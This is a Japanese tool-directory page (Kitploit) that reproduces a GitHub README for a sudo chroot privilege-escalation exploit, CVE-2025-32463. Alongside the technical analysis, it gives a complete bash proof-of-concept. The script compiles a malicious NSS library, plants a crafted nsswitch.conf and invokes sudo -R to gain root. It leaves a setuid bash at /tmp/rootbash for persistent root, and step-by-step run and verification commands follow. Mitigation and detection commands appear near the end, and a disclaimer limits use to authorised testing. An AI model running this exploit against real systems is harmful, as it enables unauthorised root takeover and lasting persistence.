Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32463 — CVE-2025-32463を狙ったローカル権限昇格エクスプロイトで、sudoのchroot設計上の欠陥を標的としています。該当するsudoバージョン1.9.14~1.9.17向けのPoCスクリプト、技術分析、および緩和策ガイダンスを提供します。 | Kitploit
ツール/GitHubGitHub/kaiht-ladiant/cve-2025-32463
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubkaiht-ladiant/cve-2025-32463

CVE-2025-32463

CVE-2025-32463を狙ったローカル権限昇格エクスプロイトで、sudoのchroot設計上の欠陥を標的としています。該当するsudoバージョン1.9.14~1.9.17向けのPoCスクリプト、技術分析、および緩和策ガイダンスを提供します。

リポジトリを見る
271年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32463 - Sudo Chroot 権限昇格エクスプロイト

概要

CVE-2025-32463 は、sudo バージョン 1.9.14 から 1.9.17 における深刻なローカル権限昇格の脆弱性です。この脆弱性により、sudo 権限を持つ攻撃者が chroot オプションの処理ロジックにおける設計上の欠陥を悪用して root アクセスに昇格することが可能になります。

脆弱性の詳細

  • CVE ID: CVE-2025-32463
  • 影響を受けるバージョン: sudo 1.9.14 - 1.9.17
  • 脆弱性の種類: ローカル権限昇格 (LPE)
  • 深刻度: 重大
  • 修正版: sudo 1.9.17p1 以降

技術的説明

この脆弱性は、sudo のセキュリティ検証プロセスにおける タイミングの問題 に起因します。pivot_root 関数が セキュリティポリシーの検証より前に 実行されるため、攻撃者は sudo が認証および承認に使用するファイルシステム環境を操作できます。

攻撃の流れ

  1. 環境の操作: 攻撃者は、悪意のある nsswitch.conf を含む制御下の chroot 環境を作成します。
  2. ライブラリの注入: 悪意のある NSS (Name Service Switch) ライブラリが制御下の環境に配置されます。
  3. 権限昇格: sudo が悪意のあるライブラリを root 権限でロードし実行します。
  4. ルートアクセス: 攻撃者は完全な root シェルアクセスを獲得します。

影響を受ける関数

  • pivot_root: プロセス内で早期に実行される
  • set_cmnd_path: 操作された環境内で動作する
  • command_matches: 環境操作によりセキュリティチェックが迂回される

前提条件

このエクスプロイトを使用する前に、以下の条件が満たされていることを確認してください。

  • 対象システムが sudo バージョン 1.9.14 - 1.9.17 を実行している
  • 現在のユーザーに sudo 権限がある
  • sudoers 設定が chroot 操作を許可している
  • gcc コンパイラが対象システムで利用可能
  • 一時ディレクトリ(例: /tmp)への書き込みアクセス権がある

使用方法

クイックスタート

  1. このリポジトリをクローン:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. スクリプトを実行可能にする:
chmod +x cve-2025-32463.sh
  1. エクスプロイトを実行する:
./cve-2025-32463.sh

手動確認

対象システムが脆弱かどうかを確認する:

# sudo バージョンを確認
sudo --version

# sudo 権限を確認
sudo -l

# chroot 関連の権限を検索
sudo -l | grep chroot

エクスプロイトコード

メインのエクスプロイトスクリプト (cve-2025-32463.sh):

#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}

確認

エクスプロイト成功後、root アクセスを確認:

# 現在の権限を確認
whoami

# 証明ファイルを確認
cat /tmp/pwned_proof.txt

# setuid bash で永続的な root アクセスを利用
/tmp/rootbash -p

緩和策

即時対応

  1. sudo を更新 バージョン 1.9.17p1 以降に:

    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo
    
    # CentOS/RHEL
    sudo yum update sudo
    
    # または
    sudo dnf update sudo
    
  2. sudoers から chroot ディレクティブを削除 (一時的な回避策):

    # 現在の設定をバックアップ
    sudo cp /etc/sudoers /etc/sudoers.backup
    
    # chroot 関連のエントリを削除
    sudo sed -i '/chroot/d' /etc/sudoers
    
    # 構文を確認
    sudo visudo -c
    

検出

エクスプロイトの試行を監視:

# 不審な一時ディレクトリを確認
find /tmp -name "*.stage.*" -type d

# sudo ログを監視
tail -f /var/log/auth.log | grep sudo

# NSS ライブラリのコンパイルを確認
find /tmp -name "libnss_*.so*" -type f

技術的詳細

根本原因分析

この脆弱性は、sudo の実行フローにおける設計上の欠陥 に起因します。

  1. 想定される正常なフロー:

    • ユーザー入力を解析
    • sudoers ポリシーを検証
    • 環境を設定 (chroot を含む)
    • コマンドを実行
  2. 実際の脆弱なフロー:

    • ユーザー入力を解析
    • chroot (pivot_root) を実行 - ここで問題が発生
    • sudoers ポリシーを検証 (操作された環境内で)
    • コマンドを実行

NSS ライブラリの悪用

このエクスプロイトは Name Service Switch (NSS) システムを利用します。

  1. sudo はユーザー認証のために /etc/nsswitch.conf を読み取る
  2. chroot 環境では、攻撃者がこのファイルを制御する
  3. 悪意のある NSS ライブラリが root 権限でロードされる
  4. ライブラリコンストラクタが root として任意のコードを実行する

テスト環境

このエクスプロイトは以下でテストされています:

  • Ubuntu 20.04/22.04 (sudo 1.9.15)
  • Debian 11/12 (sudo 1.9.14-1.9.17)
  • CentOS 8/9 (影響を受ける sudo バージョン)
  • 脆弱な sudo インストールを含む Docker コンテナ

参考文献

  • 公式 sudo セキュリティアドバイザリ
  • Rich Mirch による元の研究
  • Sudo ソースコード分析

免責事項

⚠️ 重要なお断り ⚠️

このツールは 教育目的および許可されたテスト目的のみ に提供されています。

  • 所有している、またはテストする明示的な許可を得ているシステムでのみ使用してください
  • 無断でこのエクスプロイトを使用することは違法かつ非倫理的です
  • 著者は誤用や損害に対して一切の責任を負いません
  • セキュリティテストを実施する前に、必ず適切な許可を得てください

貢献

貢献を歓迎します! 以下の手順に従ってください:

  1. リポジトリをフォーク
  2. フィーチャーブランチを作成
  3. 詳細な説明とともにプルリクエストを送信

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています - 詳細は LICENSE ファイルを参照してください。

変更履歴

v1.0.0

  • 初回リリース
  • 基本的なエクスプロイト機能
  • 包括的なドキュメント

注意: この脆弱性は重要なシステムコンポーネントに影響します。責任を持って使用し、すべてのテストが許可されていることを確認してください。

ツールをダウンロード